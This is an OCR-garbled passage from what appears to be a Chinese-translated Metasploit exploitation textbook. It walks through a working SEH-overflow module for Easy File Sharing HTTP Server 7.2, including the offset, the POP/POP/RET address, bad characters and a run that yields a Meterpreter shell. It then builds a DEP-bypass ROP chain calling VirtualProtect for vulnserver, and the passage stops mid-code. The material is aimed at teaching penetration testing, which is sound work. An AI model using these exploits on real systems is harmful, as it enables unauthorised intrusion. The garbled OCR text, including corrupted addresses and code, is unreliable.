示例 中 的 应 用 程序 在 接收 到 下 面 的 HEAD 请 求 后 就 会 甬 溃 ，HEAD 后 面 是 使 用 
pattern_create 工具 创建 的 无 用 数据 ， 然 后 是 HTTP/1.0rnrn。 








1. Mona 脚本 


Mona 脚本 是 一 个 用 Python 编写 的 用 于 immunity 调试 器 的 插件 ， 它 提供 了 大 量 用 于 渗透 的 功能 。 
个 脚本 可 以 从 https://github.com/corelan/mona/blob/master/mona.py 下 载 。 插件 的 安装 也 很 简单 ， 只 需 
要 将 这 个 脚本 放置 在 \Program Files\Immunity Inc\immunity 调试 需 \PyCommands 目录 中 即 可 。 


现在 运行 ,mona modules 命令 启动 Mona， 使 用 Mona 分 析 DLL 文件 ， 如 下 图 所 示 。 









































BADFOOD Base T Top T Size T Rebase | SafeSEH | ASIR | NXCompat | OS D11 | Version, Modulename & Path 

BADFOOD 一 一 一 

BADFOOD 0x10000000 | Ox10050000 | 0x00050000 | False | False | False | False | False | -1.0- [ImageLoad.dll] (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.d11)| 
-BADFO0D ^ 0x75320000 | 0x75455000 | 0x00135000 | True | True | True | True | True | 8.00.7600.16385 [urlmon.dll] (C: WiindowsVsysten32Vurlmon.dll) 

-BADFOOD ^ 0x73520000 | 0x73530000 | 0x00010000 | True | True | True | True | True | 6.1.7600.16385 [NLAapi.d11] (C: Windows Vsystem32 WWLAapi.dl1) 

-BADFO0D ^ 0x750c0000 | Ox751dc000 | 0x0011c000 | True | True | True | True | True | 6.1.7600.16385 [CRYPT32.d11] (C:\Windows\system32\CRYPT32.d11) 

-BADFO0D ^ 0x74920000 | 0x74964000 | 0x00044000 | True | True | True | True | True | 6.1.7600.16385 [DNSAPI.d11] (C: Windows Vsystem32VDNSAPI.dll) 

-BADFO0D ^ 0x002e0000 | 0x00325000 | 0x00045000 | True | True | False | False | False | 0.9.8k [SSLEAY32.dll] (C:VEFS Software\Easy File Sharing Web ServerVSSLEAY32.dll) 
—BADFO0D ^ 0x75700000 | 0x757d4000 | OxO00d4000 | True | True | True | True | True | 6.1.7600.16385 [kerne132.d11] (C:\Windows\system32\kernel32.d11) 

-BADFO0D ^ 0x75570000 | 0x7561c000 | OxO00acO00 | True | True | True | True | True | 7.0.7600.16385 [nsvcrt.d11] (C: Windows Vsystem32Wnsvcrt.dll) 

—BADFO0D ^ 0x74£70000 | Ox74£7c000 | 0x0000c000 | True | True | True | True | True | 6.1.7600.16385 [CRYPTEASE.dll] (C: Windows Vsystem32VCRYPTBASE.d11) 

—BADFOOD ^ 0x70550000 | Ox705cc000 | Ox0001c000 | True | True | True | True | True | 6.1.7600.16385 [oledlg.d11] (C: Windows Vsystem32Voledlg.d11) 

—BADFO0D ^ 0x61c00000 | Ox61c99000 | 0x00099000 | False | False | False | False | False | 3.8.8.3 [sglite3.dll] (C:VEFS SoftwarelEasy File Sharing Web Server sqlite3.dll) 

-BADFO0D ^ 0x73950000 | 0x739c3000 | 0x00013000 | True | True | True | True | True | 6.1.7600.16385 [dwmapi.dll] (C: Windows Vsystem32Vdwmapi.dll) 

-BADFO0D ^ 0x76ed0000 | 0x7700c000 | Ox0013cO00 | True | True | True | True | True | 6.1.7600.16385 [ntdll.d11] (C: WiindowsVSYSTEM32Wntdll.dll) 

—BADFOOD ^ Ox6d570000 | Ox6db82000 | 0x00012000 | True | True | True | True | True | 6.1.7600.16385 [pnrpnsp.dll] (C: WindowsVeysten32Vpnrpnsp.dll) 

—BADFO0D ^ Ox6db60000 | Ox6db6d000 | 0x0000d000 | True | True | True | True | True | 6.1.7600.16385 [wshbth.d11] (C: Windows Vsystem32 Wshbth.dll) 

-BADFO0D  0x74460000 | 0x74465000 | Ox00005000 | True | True | True | True | True | 6.1.7600.16385 [wshtcpip.dll] (C: WiindowsVSystem32Wishtcpip.dll) 

-BADFO0D ^ Ox005d0000 | 0x006e7000 | 0x00117000 | True | False | False | False | False | 0.9.8k [LIBEAY32.dll] (C:VEFS SoftwareVEasy File Sharing Web Server VLIBEAY32.dll) 
-BADFO0D ^ 0x77020000 | 0x7702a000 | 0x0000a000 | True | True | True | True | True | 6.1.7600.16385 [LPK.d11] (C:\Windows\system32\LPK.d11) 

-BADFO0D ^ 0x757e0000 | 0x757£9000 | 0x00019000 | True | True | True | True | True | 6.1.7600.16385 [sechost.dll] (C: Windows VSYSTEM32Vsechost.dll) 

—BADFO0D ^ 0x75530000 | Ox75d29000 | Ox001f9000 | True | True | True | True | True | 8.00.7600.16385 [iertutil.dll] (C: Windows Vsystem32Mertutil.dll) 

BADFOOD ^ 0x75e80000 | 0x75£20000 | 0x000a0000 | True | True | True | True | True | 6.1.7600.16385 [ADVAPI32.d11] (C: Windows Vsystem32VADVAPI32 .dll) 

—BADFOOD 0x00400000 | Ox005c2000 | Ox001c2000 | False | False | False | False | False | 7.2.0.0 [fsws.exe] (C:VEFS SoftwarelEasy File Sharing Web Server\fsws .exe) 








由 上 图 可 知 ， 这 里 的 DLL 文件 很 少 ， 
以 查找 POP/POP/RET 指令 的 相关 地 址 。 








F 
mE 
ko» 


没有 受 SafeSEH 机 制 的 保护 。 利 用 这 些 文件 ， 就 可 














如 果 想 获取 关于 Mona 脚本 的 更 多 信息 , 请 访问 https://www.corelan.be/index.php/211/ 
7/14/mona-py-the-manual/。 


2. msfpescan 的 使 用 


可 以 使 用 msfpescan 的 -p 参数 轻松 地 找到 POP/POP/VRET 指令 序列 .下 面 给 出 了 在 ImageLoad.dll 
文件 中 应 用 这 个 方法 的 结果 。 


rootGkali:/usr/share/framework2£ ./msfpescan -s -f /root/DownLoads/ImageLoad .dLL 
0x1000de77 eax esi ret 
0x1001a647 ebx edi ret 
Kx1001a64d ebx edi ret 
0x10004c40 ebx ecx ret 
0x1000645c ebx ecx ret 
0x100080b3 ebx ecx ret 
0x100092e9 ebx ecx ret 
0x10009325 ebx ecx ret 
0x1000b608 ebx ecx ret 
0x1000b748 ebx ecx ret 
0x1000b7f7 ebx ecx ret 
0x1000c236 ebx ecx ret 
0x1000dlc2 ebx ecx ret 
0x1000dlca ebx ecx ret 
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让 我 们 使 用 一 个 安全 的 地 址 ,排除 所 有 可 能 会 引起 HTTP. 协议 问题 的 地 址 ( 例如 说 连续 不 断 的 0 )。 
0x10019f17 esi edi ret 
0x10019fbb ^ esi edi ret 
0x100228f2 esi edi ret 
0x100228ff esi edi ret 
0x1002324c esi edi ret 
0x1000387b esi ecx ret 
0x100195f2 esi ecx ret 
0x1001964e esi ecx ret 
0x10019798 esi ecx ret 
0x100197b5 esi ecx ret 

我 们 将 会 使 用 0x10019798 作为 POP/POP/RET 的 地 址 。 现 在 已 经 有 了 两 个 用 来 编 














重要 组 件 , 一 个 是 偏 移 量 , 男 一 个 是 用 来 载 入 catch 块 的 地 址 ， 也 就 是 POP/POP/RI 





写 渗 透 模 块 的 
ET 指令 地 址 。 现 在 

















就 差 一 条 短 唱 
库 文件 的 内 置 功能 便 可 以 提供 短 跳 转 指 令 。 








3.3.4 编写 Metasploit 的 SEH 渗透 模块 
HAT 




















现在 我 们 已 经 # 
过 程 如 下 。 








t 转 指令 了 一 一 用 来 载 人 下 一 条 SEH 记 录 的 地 址 ,并 帮助 程序 跳 转 到 ShellCode Metasploit 


] 于 渗透 目标 应 用 程序 的 全 部 重要 数据 , 接着 创建 Metasploit 中 的 渗透 模块 ， 


class MetasploitModule 


Rank 


NormalRanking 


include Msf::Exploit 


include Msf::Exploit: 


def initialize(info 


< Msf::Exploit::Remote 


: :Remote: : Tcp 
:Seh 


{}) 


super(update info(info, 


'Name' 
'Description' 


-» 'Easy File Sharing HTTP Server 7.2 SEH Overflow', 


=> %q{ 


This module demonstrate SEH based overflow example 


), 


'Author' => 'Nipun', 
'License' => MSF LICENSE, 
'Privileged' -» true, 
'DefaultOptions' => 
( 
'EXITFUNC' => 'thread', 
'RPORT' => 80, 
Fa 
'Payload' => 
{ 
'Space' -» 390, 
'BadChars' => "x00x7ex2bx26x3dx25x3ax22x0ax0dx20x2fxb5cx2e", 
Jer 
'Platform' -» 'win', 


'"Targets' 


[ 
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[ 'Easy File Sharing 7.2 HTTP', ( 'Ret' 


=> 4061) ], 
l, 


'DisclosureDate' => 'Mar 4 2018', 
'DefaultTarget' => 0)) 


end 


=> 


0x10019798, 'Offset' 





我 们 之 前 已 经 编写 过 各 种 模块 的 头 部 了 一 一 首先 引入 所 需 的 库 文 件 ， 接 着 定义 类 和 模块 类 














型 一 一 这 和 之 前 完成 的 模块 是 一 样 的 。 我 们 在 初始 化 部 分 定义 了 名 字 、 描 述 、 作 者 信息 、 许 可 信息 、 


攻击 载荷 选项 、 漏 洞 泄露 日 期 和 默认 目标 。 还 月 














到 了 一 个 地 址 和 一 个 偏 移 量 : 地 址 是 POP/ POP/RET 





指令 的 地 址 0x10019798, 保存 在 变量 Ret (return address ) P; 偏 移 量 4061 保存 在 变量 offset Ho 
这 两 个 变量 都 保存 在 Target 字段 中 。 我 们 之 所 以 使 用 4061 来 代替 4065， 是 因为 Metasploit 会 自动 
跳 转 指令 。 因 此 ， 要 将 4065 字 节 的 地 址 向 前 移 4 个 字 节 ， 这 样 就 可 以 把 
短 跳 转 指令 放 到 原本 用 来 存放 下 一 条 SEH 记录 地 址 的 位 置 。 


在 进行 更 深入 的 学 习 之 前 ， 先 来 看 看 在 这 些 模 块 中 使 用 到 的 重要 函数 。 我 们 之 前 已 经 看 过 了 





生成 一 个 到 ShellCode 的 短 

















make_nops .connect .disconnect 和 handler 这 4 个 函数 的 


函数 的 详细 信息 。 


E o 


















































E x 件 


JE, FE 











aur generate seh record() 


用 B 





generate seh  record() 


回 到 代码 : 


def exploit 
connect 
weapon - "HEAD " 


/lib/msf/core/exploit/seh.rb 


weapon «« make nops(target['Offset']) 


weapon «« generat 


e seh record(target.ret) 


weapon «« make nops(19) 
weapon «« payload.encoded 


weapon «« " HTTP/ 
Sock.put (weapon) 
handler 
disconnect 
end 

end 


1.0rnrn" 














这 个 国 数 提供 了 产生 SEH 记 录 的 方法 





这 个 渗透 函数 首先 连接 目标 ， 然 后 产生 一 个 恶意 的 HEAD 请 求 (通过 向 HEAD 请 求 添 加 4061 个 
nerate_seh_record () 函数 生成 一 条 8 字 节 的 SEH 记录 ， 其 中 的 前 4 个 














NOP 实现 )。 接 着 ,使 用 g 




















字 节 会 让 指令 跳 转 到 攻击 载荷 上 。 通 常 这 4 个 字 节 包含 着 如 "\xeb\x0RA\x90\x90" 这 样 的 指令 , 其 中 
wxeb 意味 着 短 跳 转 指令 ，\x0&A 表示 要 跳 过 12 字 节 ，\x90\x90 NOP 指令 则 作为 填充 ， 保 证 长 度 为 





4 个 字 市 。 


使 用 NASM shell 编写 


使 用 NASM shell 编写 短 汇 编 代 码 相当 方便 。 我 们 在 上 一 节 








汇编 指令 














使 





自动 创建 了 SEH 记录， 并 |] 





且 只 使 用 了 简短 的 汇编 代码 一 一 \xep\x0 








ETT 


generate seh record() 





a 


eno 12 neas 
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令 。 不 过 当 我 们 要 手动 生成 SEH 记录 时 ， 则 完全 不 需要 上 网 去 查找 操作 码 ， 只 需 使 用 NASM shell 就 
可 以 轻松 地 编写 出 汇编 代码 。 









































在 上 一 个 示例 中 ,我 们 已 经 有 了 一 个 简单 的 汇编 调用 ， 就 是 JMP SHORT 12。 不 过 我 们 还 不 知道 
这 条 指令 的 操作 码 ， 因 此 使 用 NASM shell 来 找 出 这 个 操作 码 。 








root@mm: /usr/share/metasploit-framework/tools/exploit# ./nasm shel 
l.rb 


nasm > jmp short 12 
00000000 EBOA 
nasm > 


由 上 图 可 知 ， 在 目录 /usr/share/Metasploit-framework/tools/exploit 中 运行 nasm shell.rb 脚本 之 后 ， 
就 可 以 通过 简单 地 输入 命令 获得 对 应 的 操作 码 了 。 这 一 次 得 到 的 操作 码 和 之 前 讨论 过 的 一 样 ， 都 是 
EB0A。 因 此 ， 在 之 后 所 有 的 示例 中 都 将 使 用 NASM shell， 这 可 以 节省 大 量 的 时 间 和 精力 。 


现在 回 到 主题 上 来 。Metasploit 允许 我 们 使 用 generate_seh_record() 函数 跳 过 提供 跳 转 指令 
和 到 达 攻 击 载荷 的 字 节 数量 。 接 下 来 ,我 们 要 在 攻击 载荷 前 填充 一 些 数据 ， a 
行 的 不 利 因素 , 并 使 用 HTTP/1.0\r\n\r\n 作为 请 求 头 部 的 结束 部 分 。 最 后 , 将 保存 在 变量 weapon 
中 的 数据 发 送 到 目标 上 ， 然 后 调用 handler 方法 来 检查 该 尝试 是 否 成 功 。 如 果 成 功 ， 我 们 将 获得 控 什 
目标 的 权限 。 


下 面 来 运行 这 个 模块 ， 并 对 其 进行 分 析 。 


jmp short Oxc 













































































c 


























msf > use exploit/masteringmetasploit/easy-filesharing 
msf exploit(easy-filesharing) > show options 


Module options (exploit/masteringmetasploit/easy-filesharing): 


Name Current Setting Required Description 


RHOST yes 


The target address 
RPORT 80 yes 


The target port (TCP) 


Exploit target: 


Id Name 


0 Easy File Sharing 7.2 HTTP 


























下 面 设置 模块 所 需 的 所 有 选项 ， 然 后 运行 exploit fü 


令 。 





msf exploit(easy-filesharing) > set RHOST 192.168.116.133 
RHOST => 192.168.116.133 


msf exploit(easy-filesharing) » set payload windows/meterpreter/bind tcp 
payload -» windows/meterpreter/bind tcp 
msf exploit(easy-filesharing) » exploit 


[*] Started bind handler 
[*] Sending stage (179267 bytes) to 192.168.116.133 


meterpreter > lj 
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我 们 成 功 地 渗透 了 运行 着 Windows 7 的 目标 系统 。 现 在 你 知道 在 Metasploit 中 创建 一 个 SEH 模 
块 是 多 么 简单 的 事情 了 吧 ! 在 下 一 节 中 ， 我 们 会 再 深入 一 些 ， 研 究 如 何 绕 过 DEP 之 类 的 安全 机 制 。 

















e 想 获取 更 多 关于 SEH mixin 的 详细 信息 ， 请 访问 https://github.com/rapid7/metasploit- 


framework/wiki/How-to-use-the-Seh-mixin-to-exploit-an-exception-handler。 


3.4 在 Metasploit 模块 中 绕 过 DEP 


数据 执行 保护 ( data execution prevention, DEP ) 是 一 种 将 特定 内 存 区 域 标记 为 不 可 执行 的 保护 机 
制 ， 这 种 机 制 会 导致 我 们 在 渗透 过 程 中 无 法 执行 ShellCode。 因 此 ， 即 使 我 们 可 以 改写 EIP 寄存 器 
的 内 容 并 成 功 地 将 ESP 指向 了 ShellCode 的 起 始 地 址 ,也 无 法 执行 攻击 载荷 。 这 是 因为 DEP 的 存在 阻 
止 了 内 存 中 可 写 区 域 (例如 栈 和 堆 ) 中 数据 的 执行 。 在 这 种 情况 下 ， 我 们 必须 使 用 可 执行 区 域 中 的 现 

让 指令 实现 预期 的 功能 可 以 通过 将 所 有 的 可 执行 指令 放置 成 一 个 可 以 让 跳 转 跳 到 ShellCode 的 顺 
序 来 实现 这 一 目的 。 

绕 过 DEP 的 技术 被 称 为 返回 导向 编程 (return oriented programming, ROP ) 技术 ， 它 不 同 于 通过 
覆盖 改写 EIP 内 容 ， 并 跳 转 到 ShellCode 栈 溢出 的 普通 方法 。 当 DEP 启用 之 后 ， 我 们 将 无 法 使 用 这 种 
技术 ， 因 为 栈 中 的 数据 是 不 能 执行 的 。 因 此 我 们 不 再 跳 转 到 ShellCode, ， 而 是 调用 第 一 个 ROP 指令 片 
段 (gadget )。 这 些 指令 片段 会 共同 构成 一 个 链 式 结构 ， 一 个 指令 片段 会 返回 下 一 个 指令 片段 ， 而 不 执 
行 栈 中 的 任何 代码 。 

我 们 将 在 下 一 节 看 到 如 何 查找 ROP 指令 片段 。 它 通过 寄存 器 完成 各 种 操作 的 指令 ， 后 面 都 以 一 
条 return (RET ) 指令 结尾 。 想 要 找到 ROP 指令 片段 ， 最 好 的 方法 就 是 在 载 人 的 模块 (DLL ) 中 查找 。 
这 些 指令 片段 依次 从 栈 中 执行 ， 并 返回 下 一 个 地 址 ， 这 种 组 合 方式 被 称 为 ROP 链 。 

我 们 现在 已 经 有 了 一 个 有 栈 溢出 漏洞 的 示例 应 用 程序 。 将 EIP 的 偏 移 量 改写 为 2006。 下 面 给 出 了 
使 用 Metasploit 成 功 渗透 这 个 程序 之 后 的 显示 。 


msf exploit(example9999-1) > exploit 




















































































































[*] Started bind handler 

[*] Sending stage (957487 bytes) to 192.168.10.107 

[*] Meterpreter session 1 opened (192.168.10.118:46127 -> 192.168.10.107:4444) a 
t 2016-04-15 01:21:27 -0400 





meterpreter > fj 

我 们 已 经 轻松 地 获得 了 目标 的 Meterpreter 控制 权限 。 接 下 来 在 目标 的 Windows 操作 系统 中 打开 

DEP 保护 ， id 以 在 系统 属性 (system property ) 的 高 级 系统 属性 (advanced system property ) 
中 打开 ， 如 下 图 所 示 。 
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GO-* > Control Panel » All Control Panel Items » System 了 | 好 
Control Panel Home System Properties X. Performance Options bd 
Computer Name | Hardware | Advanced [System Protection | Remote] Visual Effects | Advanced | Data Execution Prevention 


~ Device Manager 
， sns: You must be logged on as an Administrator to make most of these changes. 


Performance against damage from viruses and other security 


_ | Data Execution Prevention (DEP) helps protect 
threats. How does it work? 


~ System protection 
Visual effects, processor scheduling. memory usage. and virtual memory 








"y Advanced system settings (C) Turn on DEP for essential Windows programs and services 
Setlings... only 
| EN (Q) Turn on DEP for all programs and services except those I 
F) select: 
System Properties 
o The changes you have made require you to restart your Settings... 
computer before they can take effect. Du MA 


Settings... 


Environment Variables... 


Your computer's processor supports hardware-based DEP. 





























Computer description: 


sesos Workgroup: WORKGROUP l ox | | Cancel JI Apeh, 

















Action Center 


接 下 来 选中 “为 除 选中 项 以 外 的 所 有 程序 和 服务 开启 DEP 保护 ”( Turn on DEP for all programs and 
services except those I select ) 来 启动 DEP， 然 后 重新 启动 我 们 的 系统 ， 尝 试 渗透 同一 个 漏洞 ， 结 果 如 
下 图 所 示 。 

















msf exploit(example9999-1) > exploit 


[*] Started bind handler 
[*] Exploit completed, but no session was created. 











这 次 渗透 失败 了 ， 因 为 ShellCode 并 没有 执行 。 


可 以 从 以 下 地 址 下 载 示 例 程序 : http:/www.thegreycorner.com/2010/12/introducing-vulnserver. 
html。 


我 们 将 在 下 一 节 看 到 如 何 使 用 Metasploit 绕 过 DEP 的 限制 ， 并 获得 被 保护 系统 的 控制 权限 。 保 持 
DEP 保护 运行 ， 将 这 个 有 漏洞 的 应 用 程序 附加 到 调试 器 中 ， 显 示 的 结果 如 下 图 所 示 。 


SafeSEH ; ASLR  : NXCompat ! OS Dll ! Version, Modulenane & Path 










































H H H Irue i True ! True | True 6.1.7600.16385 en32NLPK.d11» 

H H IDB6868 : i True i True | True i True 1 6.1.76800.16385 sten32\NSI.d11) 
Bx62590888 ! Bx62598888 ! AxAAHASBAA ; False ! False ! False ! False ! False ! -1.0- [essfunc. topNUulnvessfunc.dll5 
8x76470888 !; 8x7653c880 ! Bx808cc800 ; True i True | Ire (| True i True i 6.1.7600.16385 systen32\MSCIF.d11> 
Bx7555DBBB ! Bx7559a860 ! 8@x8004al | Irue ! True | Irue ! True 1 True 1 6. a dd ia E EE a d11) 
DBx74eaDBBB8 ! Bx74edcB66 ! AxAAAIcCOAA ! True ! True i True ! True ! True ! 6. en32*snsusoc D 
0x774a000ð : 8x7753d808 ! Bx9089d668 ; True i True i True | True i True 1-3. ten32NUSP18.d115 
8x76540880 | 0x7658e8080 ! 8x8604eB68 ; True i True i True | True i True 16.1. 5ysten32NGDI32.d11» 
BxBa400BBB | (xG0447000 ! ð i False i False | False | False | False ! -i.ð- [vulnserver.exe] (C: de: xVDesktopNUulnsvulnserver. exe? 
9x778090000 ! (x77164000 ! BxBaad46609 ! True ! True t True |! True ! True 1 6.1.7680.16385 [kernel32.d11] (C:M td e dll» 
0x77200000 ! 8x772ac880 ! Bx9aaacB68 ! True ! True | True ! True | True 1 7.8.7688.16385 [msvcrt-dl1] (C:Wi en32Nnsucrt.dll» 
8x76590888 | 8x7665988080 ! 8x888c9808 ; True i True i True | True i Irue | 6.1.7688.16385 [user32.d11] CC:\Hindows Wsteni2 userd2. dll) 
Bx77310000 : Bx7744cB88 ! Bx8013c808 ! True i True i True ! True i True i 6.1.7688.16385 Intdll.d11] 《C:\Windows\SYSTEM32\ntd11.411> 





和 之 前 一 样 ， 输 入 命令 !tmona modules 启用 Mona 脚本 ， 就 可 以 找到 所 有 模块 的 信息 。 不 过 为 
了 构建 ROP 链 ， 需 要 在 这 些 DLL 文件 中 找到 所 有 可 执行 ROP 的 指令 片段 。 
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3.4.1 使 用 msfrop 查找 ROP 指令 片段 

Metasploit 提供 了 一 款 可 以 查找 ROP 指令 片段 的 便利 工具 : msfrop。 这 款 工具 不 仅 可 以 列 出 所 有 
ROP 指令 片段 ,还 可 以 在 这 些 指令 片段 中 找到 符合 我 们 需求 的 部 分 。 下 面 使 用 msfrop 查找 一 条 可 以 
实现 ECX 寄存 器 出 栈 操作 的 指令 片段 ， 过 程 如 下 图 所 示 。 


















































[zootekali:~# msfrop -v -s "pop ecx" msvcrt.dll | 


使 用 -s 参数 进行 查找 ， 使 用 -v 实现 详细 输出 之 后 ， 我 们 首先 得 到 了 所 有 使 用 POP ECX 操作 的 EE 
指令 片段 。 下 图 为 操作 结 




















[*] gadget with address: 0x6ffdb1d5 matched 
Ox6ffdbld5: pop ecx 
Ox6ffdbld6: ret 


[*] gadget with address: Ox6ffdf68f matched 
Ox6ffdf68f: pop ecx 
Ox6ffdf690: ret 


[*] gadget with address: Ox6ffdfc9d matched 
Ox6ffdfc9d: pop ecx 
Ox6ffdfc9e: ret 


我 们 现在 已 经 找到 了 大 量 可 以 用 来 完成 POP ECX 操作 的 指令 片段 。 不 过 为 了 构建 一 个 可 以 成 功 
绕 过 DEP 保护 机 制 的 Metasploit 渗透 模块 ， 我 们 需要 在 栈 中 建立 一 个 不 会 执行 任何 实际 操作 的 ROP 
指令 片段 链 。 下 图 展示 了 使 用 ROP 绕 过 DEP 保护 的 原理 。 

















0x000000 0x000000 0x000000 














我 们 的 变量 
所 占 的 空间 









aa 
OxDEADBEEF 
AAAAAAAAAAAAAAAAAAAA . 
AAAAAAAAAAAAAAAAAAAA RED 


OxFFFFFFFF OxFFFFFFFF OxFFFFFFFF 


POP ECX 
AAAAAAAA RET 
ROP 指 令 片 段 1 
ROP 指 令 F 段 2 ADD ECX,80 
ROP 指 令 片 段 3 p 
LJ 
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左 侧 是 一 个 正常 程序 的 分 布 图 ; 中 间 是 一 个 被 缓冲 区 溢出 漏洞 攻击 过 的 程序 分 布 图 ， 其 中 的 EIP 














寄存 器 已 经 被 覆盖 改写 ; 右 侧 是 一 个 用 来 绕 过 DEP 机 制 的 分 布 图 一 一 这 里 并 没有 使 用 JMP ESP 的 地 
址 ， 而 是 使 用 ROP 指令 片段 的 地 址 改写 了 EP 中 的 内 容 ， 后 面 紧 接 着 另 一 个 ROP 指令 片段 ， 直 到 
ShellCode 成 功 执行 。 





那么 如 何 才能 绕 














过 人 硬件 启用 的 DEP 保护 呢 ? 


答案 很 简单 ， 技 巧 就 是 将 这 些 ROP 指令 片段 连 成 一 个 链 ， 以 便 调用 VirtualProtect O 函数 。 
它 是 一 个 内 存 保护 函数 ， 可 以 让 栈 中 数据 执行 ， 从 而 使 ShellCode 执行 。 下 面 来 看 一 下 如 何在 受 DEP 





保护 的 情况 下 进行 渗透 。 


(1) 计算 到 EIP 寄存 器 的 偏 移 量 。 
(2) 使 用 第 一 个 ROP 指 





(3) 使 用 其 他 的 指 


(4) 执行 ShellCode。 











令 片 段 覆 盖 改 写 寄存 器 。 








令 片 段 持 续 履 盖 改 写 寄 存 器 ， 直 到 ShellCode 可 执行 。 





3.4.2 ”使 用 Mona 创建 ROP 链 
通过 使 用 immunity 调试 器 中 的 Mona 脚本 ， 不 仅 可 以 找到 ROP 指令 片段 ， 还 可 以 创建 整个 ROP 


链 ， 如 下 


在 immunity 调试 器 的 命令 
于 ROP 代码 片段 的 信息 。 


图 所 示 。 











ØBADFOAD 
i 


ØBADFOAD 


ØBADFOAD 





ROP generator finished 


BBRDFBBD [+] Preparing output file 'stackpivot.txt" 
一 《Re>setting logfile c:*UsersMflpexNDesktopNnnNstackpiuot.txt 
SEADEEED [+] Writing stackpivots to file c:\Users\fApex\Desktop\mn\stackpivot .上 txt 
D Wrote 16264 pivots to fil 
GBADFOOD [+] Preparing DUE file 'rop.suggestions. txt' 
X«Re?setting logfile c: MisersNfipexNDesktopsnnwrop. suggestions. txt 

BBRDFO8D [+] | suggestions to file c:\Users\Apex\Desktop\mn\rop_suggestions.txt 

te 6644 suggestions, to Uds 
@BADF@@D [+] Preparing output file 'rop.t 
一 《Resetting logfile c: sers apex vDes ktopvnn rop. t 
BBRDFBBD [+] Writing results to file c: NIe nta A pOXNDOE KCODSAD NEUES txt «48698 interesting gadgets? 
Wrote 48698 interesting gadgets to file 
BBRDFBBD [+] Writing other gadgets to file c:\Users\fApex\Desktop\mn\rop.txt (55114 gadgets? 
@BADFOOD rote 55114 other gadgets to file 
@BADFO@D Done 
BBhDFBBD 
BBRDFBBD [+] This mona.py action took 8:83:34.8268088 
Imona rop -m *.dll -cp nonull 

















行 中 使 用 命令 :mona rop -m *.dll -cp nonull 就 可 以 找到 所 有 关 











下 图 给 出 了 使 用 Mona 脚本 产生 的 文件 。 














rop. progress vul rop rop. chains rop. suggestions 
nserver.exe 384 








stackpivot 
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我 们 获得 了 一 个 名 为 rop. chains.txt 的 文件 ,这 个 文件 中 包含 了 可 以 直接 用 于 渗透 模块 的 完整 ROP 
f£. pu ROP 链 使 用 Python, C 和 Ruby 语言 编写 而 成 ， 可 以 在 Metasploit 中 使 用 。 我 们 只 需 将 这 个 
ROP 链 复制 到 我 们 的 渗透 模块 中 即 可 。 


为 了 创建 一 个 可 以 触发 virtualProtect () RZJ ROP 链 ， 需 要 对 寄存 器 进行 如 下 设置 。 

































































Register setup for VirtualProtect() : 
EAX = NOP (0x90909090) 

ECX = lpOldProtect (ptr to W address) 
EDX = NewProtect (0x40) 

EBX = dwSize 

ESP = lPAddress (automatic) 

EBP = ReturnTo (ptr to jmp esp) 

ESI - ptr to VirtualProtect() 

EDI = ROP NOP (RETN) 

--- alternative chain --- 

EAX - ptr to &VirtualProtect() 

ECX = lpOldProtect (ptr to Ww address) 
EDX = NewProtect (0x40) 

EBX = dwSize 

ESP = lPAddress (automatic) 

EBP = POP (skip 4 bytes) 

ESI - ptr to JMP [EAX] 

EDI = ROP NOP (RETN) 

+ place ptr to "jmp esp" on stack, below PUSHAD 








下 图 给 出 了 使 用 Mona 脚本 创建 的 ROP 链 。 





ROP Chain for virtualProtect() [(XP/2003 Server and up)] : 


* [ Ruby ] *** 
def create rop. chain() 


# rop chain generated with mona.py - www.corelan.be 
ToP-gadgets 三 


Ox77dfb7e4, # POP ECX # RETN [RPCRT4.d11] 

0x6250609c, # ptr to &virtualProtect() [IAT essfunc.d11] 
Ox76a5fd52, # MOV ESI,DWORD PTR DS:[ECX] £ ADD DH,DH # RETN [MSCTF.d11] 
0x766a70d7, # POP EBP # RETN [USP10.d11] 

Ox625011bb, # & jmp esp [essfunc.d11] 

0x777f557c, # POP EAX # RETN [msvcrt.d11] 

Oxfffffdff, # value to negate, will become 0x00000201 
0x765e4802, # NEG EAX # RETN [user32.d11] 

Ox76a5f9f1, # XCHG EAX,EBX # RETN [MSCTF.d11] 
0x7779f5d4, # POP EAX # RETN [msvcrt.d11] 

OxffffffcO, # value to negate, will become 0x00000040 
0x765e4802, # NEG EAX £ RETN [user32. d11] 

0x76386fcO, # XCHG EAX,EDX # RETN [kernel32.d11] 
Ox77dfdO9c, # POP ECX # RETN [RPCRT4.d11] 

Ox62504dfc, # &writable location [essfunc. d11] 
Ox77e46lel, # POP EDI # RETN [RPCRT4.d11] 

0x765e4804, # RETN (ROP NOP) [user32.d11] 

0x777f3836, # POP EAX # RETN [msvcrt.d11] 

0x90909090, # nop 

0x77d43c64, # PUSHAD # RETN [ntdl1.d11] 


].flatten.pack("v*") 
return rop. gadgets 


end 


# Call the ROP chain generator inside the 'exploit' function : 








rop. chain = create rop chain() 


我 们 已 经 完成 了 create rop chain 函数 的 编写 ， 并 将 其 保存 到 了 rop_chains.txt 文 件 中 。 现 在 
只 需 将 这 个 函数 复制 到 渗透 模块 中 即 可 。 





3.4.8 ”编写 绕 过 DEP 的 Metasploit 渗透 模块 


本 节 的 目标 还 是 之 前 那个 因 开启 了 DEP. 保护 而 导致 渗透 失败 的 应 用 程序 。 这 个 程序 运行 在 9999 
mO, 并 且 存 在 一 个 栈 溢出 漏洞 。 下 面 快 速 建立 一 个 模块 , 再 次 尝试 对 这 个 开启 了 DEP 保护 的 程序 进 
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行 渗透 。 


class MetasploitModule < Msf::Exploit::Remote 


Rank NormalRanking 


include Msf::Exploit::Remote::Tcp 


def initialize(info {}) 

super(update info(info, 
'Name' 

'Description' 


=> 'DEP Bypass Exploit', 


=> %q{ 


DEP Bypass Using ROP Chains Example Module 


}, 
'Platform' 
'Author' 

[ 

'Nipun Jaswal' 

lr; 
'Payload' 
{ 
'space' 
'BadChars' 
Li 
'Targets' 


[ 


=> 


SS 
"Ax00", 


=> 


=> 


['Windows 7 Professional',{ 


l; 


'DisclosureDate' => 


)) 
register options( 
[ 
Opt : : RPORT (9999) 
1) 


end 


我 们 已 经 编写 过 很 多 个 模块 ， 而 ] 





'Offset 


'Mar 4 2018' 


量 对 初始 化 部 分 和 所 需 的 库 文 件 


b z» 20063] 


HAAA 

















E 了 。 此 外 , 我 们 也 不 再 


需要 返回 地 址 ， 因 为 ROP 链 可 以 自动 构建 一 个 跳 转 到 ShellCode 的 机 制 。 下 面 来 看 看 实现 渗透 的 代码 。 


def create rop chain() 


# rop chain generated with mona.py - www.corelan.be 


rop gadgets 
[ 


